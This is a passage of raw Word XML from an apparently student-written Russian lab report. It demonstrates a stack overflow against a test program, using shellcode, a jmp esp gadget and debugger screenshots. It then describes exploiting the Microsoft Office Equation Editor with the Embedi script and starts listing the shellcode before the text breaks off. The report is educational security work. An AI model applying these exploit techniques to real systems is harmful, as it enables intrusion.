      <w:r w:rsidRPr="00E41C36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E34644">
        <w:t>, как показано на</w:t>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:instrText xml:space="preserve"> REF _Ref212463484 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="0056345F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E34644">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEF431A" w14:textId="77777777" w:rsidR="0056345F" w:rsidRDefault="0056345F" w:rsidP="0056345F">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="0056345F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CCA5BC8" wp14:editId="1A2FCA0C">
            <wp:extent cx="5959356" cy="23700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C83" w14:textId="1CBE4B40" w:rsidR="0056345F" w:rsidRDefault="0056345F" w:rsidP="0056345F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Ref2124634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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t xml:space="preserve"> – Измененный конфигурационный файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C29A35" w14:textId="77777777" w:rsidR="00DA7F8D" w:rsidRDefault="00DA7F8D" w:rsidP="002235B3"/>
    <w:p w14:paraId="274C8BC3" w14:textId="72C789AB" w:rsidR="00E90331" w:rsidRPr="004739D2" w:rsidRDefault="00E90331" w:rsidP="002235B3">
      <w:r>
        <w:t xml:space="preserve">При запуске </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90331">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90331">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с новым конфиг-файлом в той же директории создается новый файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90331">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, содержащий в себе информацию о содержимом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90331">
        <w:t>:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C71DDD">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:instrText xml:space="preserve"> REF _Ref212463995 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004739D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BDEDE" w14:textId="77777777" w:rsidR="00C71DDD" w:rsidRDefault="00C71DDD" w:rsidP="00C71DDD">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783906BE" wp14:editId="27E7E08C">
            <wp:extent cx="6300470" cy="3419475"/>
            <wp:effectExtent l="0" t="0" r="508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6C8C" w14:textId="511CD8A3" w:rsidR="00E34644" w:rsidRDefault="00C71DDD" w:rsidP="00C71DDD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Ref2124639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2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00C71DDD">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Результат работы программы с конфиг-файлом, содержащим </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A366211" w14:textId="77777777" w:rsidR="00D96D5C" w:rsidRDefault="00D96D5C" w:rsidP="00D96D5C"/>
    <w:p w14:paraId="41F049F6" w14:textId="7D6653A8" w:rsidR="00D96D5C" w:rsidRPr="004663D8" w:rsidRDefault="00D96D5C" w:rsidP="00D96D5C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Подробно рассмотреть процесс позволяет запуск локального отладчика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96D5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96D5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004663D8">
        <w:t xml:space="preserve"> К моменту возврата из </w:t>
      </w:r>
      <w:r w:rsidR="004663D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidR="004663D8" w:rsidRPr="004663D8">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004663D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004663D8" w:rsidRPr="004663D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004663D8">
        <w:t xml:space="preserve">на стеке адрес возврата заменен на адрес инструкции из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004663D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004663D8" w:rsidRPr="004663D8">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004663D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004663D8">
        <w:t xml:space="preserve">, как показано </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004663D8">
        <w:t>на .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4550E872" w14:textId="77777777" w:rsidR="00E62666" w:rsidRDefault="004663D8" w:rsidP="00E62666">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="004663D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24B02C16" wp14:editId="4408A28C">
            <wp:extent cx="6300470" cy="187007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6E24" w14:textId="0731CDD4" w:rsidR="004663D8" w:rsidRPr="00D96D5C" w:rsidRDefault="00E62666" w:rsidP="00E6266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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Новый адрес возврата</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C04D23" w14:textId="77777777" w:rsidR="00E41C36" w:rsidRDefault="00E41C36" w:rsidP="002235B3"/>
    <w:p w14:paraId="4CBCE7DD" w14:textId="652776E2" w:rsidR="00BB3F97" w:rsidRDefault="00BB3F97" w:rsidP="002235B3">
      <w:r>
        <w:t xml:space="preserve">После, действительно, происходит выполнение этой инструкции, управление передается на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00506064">
        <w:t>, как показано на</w:t>
      </w:r>
      <w:r w:rsidR="00597CF0" w:rsidRPr="00597CF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:instrText xml:space="preserve"> REF _Ref212464678 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:t xml:space="preserve">рисунках </w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:t>-25</w:t>
      </w:r>
      <w:r w:rsidR="00506064">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E6470" w14:textId="77777777" w:rsidR="00820246" w:rsidRDefault="00BB3F97" w:rsidP="007318B2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3F97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="223F1895" wp14:editId="4EB1EB22">
            <wp:extent cx="3378200" cy="946397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6853" cy="9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0E22" w14:textId="40E839B7" w:rsidR="004663D8" w:rsidRDefault="00820246" w:rsidP="00820246">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Ref2124646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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t xml:space="preserve"> – Инструкция из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00820246">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C3AAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33452633" w14:textId="77777777" w:rsidR="007318B2" w:rsidRPr="007318B2" w:rsidRDefault="007318B2" w:rsidP="007318B2"/>
    <w:p w14:paraId="1F9C6390" w14:textId="77777777" w:rsidR="007503A5" w:rsidRDefault="009E173D" w:rsidP="007318B2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="009E173D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5426CBD4" wp14:editId="52F06D6B">
            <wp:extent cx="4504267" cy="279099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2632" cy="27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5AFC" w14:textId="64676F5A" w:rsidR="004663D8" w:rsidRPr="007503A5" w:rsidRDefault="007503A5" w:rsidP="007503A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5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007503A5">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> после выполнения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007503A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28649272" w14:textId="77777777" w:rsidR="009E173D" w:rsidRDefault="009E173D" w:rsidP="002235B3"/>
    <w:p w14:paraId="49D813CE" w14:textId="437F094A" w:rsidR="009E173D" w:rsidRDefault="009E173D" w:rsidP="002235B3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">По мере выполнения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкода</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> все необходимые аргументы и адреса функций помещаются на стек, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:instrText xml:space="preserve"> REF _Ref212464686 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00656C8A">
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:t>исун</w:t>
      </w:r>
      <w:r w:rsidR="00656C8A">
        <w:t>ках</w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00597CF0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00656C8A">
        <w:t>-28</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42237D" w14:textId="77777777" w:rsidR="00A031FD" w:rsidRDefault="009E173D" w:rsidP="00E61ADF">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="009E173D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DD3C5B" wp14:editId="7878DECC">
            <wp:extent cx="2565400" cy="3510184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9073" cy="35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0D61" w14:textId="00761FC7" w:rsidR="009E173D" w:rsidRDefault="00A031FD" w:rsidP="00A031FD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Ref2124646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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t xml:space="preserve"> – Строка с командой в правильном порядке помещена на стек</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAE9D6" w14:textId="77777777" w:rsidR="00A031FD" w:rsidRPr="00A031FD" w:rsidRDefault="00A031FD" w:rsidP="00A031FD"/>
    <w:p w14:paraId="5F2D8C8B" w14:textId="77777777" w:rsidR="00A031FD" w:rsidRDefault="00F91E9D" w:rsidP="00620DD8">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00F91E9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F6A260" wp14:editId="727D9238">
            <wp:extent cx="4318000" cy="116517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0844" cy="116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2EB0" w14:textId="606F63EB" w:rsidR="009E173D" w:rsidRDefault="00A031FD" w:rsidP="00A031FD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7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Найден адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D950C02" w14:textId="77777777" w:rsidR="00136D7A" w:rsidRPr="00136D7A" w:rsidRDefault="00136D7A" w:rsidP="00136D7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4CA058" w14:textId="77777777" w:rsidR="00A031FD" w:rsidRDefault="00E62666" w:rsidP="00620DD8">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00E62666">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B31B18B" wp14:editId="64BC8E79">
            <wp:extent cx="4343400" cy="11494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1910" cy="11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78FC" w14:textId="6B7920E9" w:rsidR="00F91E9D" w:rsidRPr="00A031FD" w:rsidRDefault="00A031FD" w:rsidP="00A031FD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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Найден адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="314372E8" w14:textId="77777777" w:rsidR="00E62666" w:rsidRDefault="00E62666" w:rsidP="002235B3"/>
    <w:p w14:paraId="505610D6" w14:textId="42033DB8" w:rsidR="00620DD8" w:rsidRDefault="00651D15" w:rsidP="00651D15">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Дополнительное задание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78169E5D" w14:textId="77916152" w:rsidR="0073025A" w:rsidRDefault="0073025A" w:rsidP="00E177D5">
      <w:r>
        <w:t xml:space="preserve">В качестве дополнительного задания требовалось </w:t>
      </w:r>
      <w:r w:rsidRPr="0073025A">
        <w:t xml:space="preserve">продемонстрировать эксплуатацию уязвимости в любом корпоративном продукте. </w:t>
      </w:r>
      <w:r w:rsidR="00262E89">
        <w:t xml:space="preserve">Была выбрана уязвимость </w:t>
      </w:r>
      <w:r w:rsidR="00262E89" w:rsidRPr="00262E89">
        <w:t xml:space="preserve">в компоненте </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00262E89" w:rsidRPr="00262E89">
        <w:t>Equation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00262E89" w:rsidRPr="00262E89">
        <w:t xml:space="preserve"> Editor (EQNEDT32.EXE) пакета Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidR="003E11CD">
        <w:t xml:space="preserve"> и скрипт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E11CD" w:rsidRPr="003E11CD">
        <w:t>Embedi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E11CD">
        <w:t xml:space="preserve"> для генерации файла, позволяющего продемонстрировать возможность запуска команды длиной до 1</w:t>
      </w:r>
      <w:r w:rsidR="00367147">
        <w:t>09</w:t>
      </w:r>
      <w:r w:rsidR="003E11CD">
        <w:t xml:space="preserve"> символов</w:t>
      </w:r>
      <w:r w:rsidR="00CA74A1">
        <w:t xml:space="preserve"> (байт)</w:t>
      </w:r>
      <w:r w:rsidR="003E11CD">
        <w:t xml:space="preserve"> при открытии такого файла при помощи продукта </w:t>
      </w:r>
      <w:r w:rsidR="003E11CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="003E11CD" w:rsidRPr="003E11CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E11CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidR="003E11CD" w:rsidRPr="003E11CD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C06048" w14:textId="0CD2CF3F" w:rsidR="003E11CD" w:rsidRDefault="00AC4269" w:rsidP="00E177D5">
      <w:r>
        <w:t xml:space="preserve">Скрипт создает вредоносный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rtf</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC4269">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл (стандартный формат текстового документа), состоящий из стандартного заголовка и заключительной части </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rtf</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC4269">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">формата и внедренного объекта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Equation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC4269">
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – уязвимого компонента с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкодом</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> для выполнения команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5925E" w14:textId="341F8FC6" w:rsidR="00AC4269" w:rsidRDefault="0065348E" w:rsidP="00E177D5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14AF02" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="004D4772" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,0</w:t>
      </w:r>
      <w:r w:rsidRPr="0065348E">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1271</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>eb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AA735" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t>mov edx,0x12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D8109" w14:textId="0F0E6AC9" w:rsidR="0065348E" w:rsidRPr="00527FA7" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">          ; Получ</w:t>
      </w:r>
      <w:r w:rsidR="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ение</w:t>
      </w:r>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> реальн</w:t>
      </w:r>
      <w:r w:rsidR="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес</w:t>
      </w:r>
      <w:r w:rsidR="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BF582" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ecx,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5661C0" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
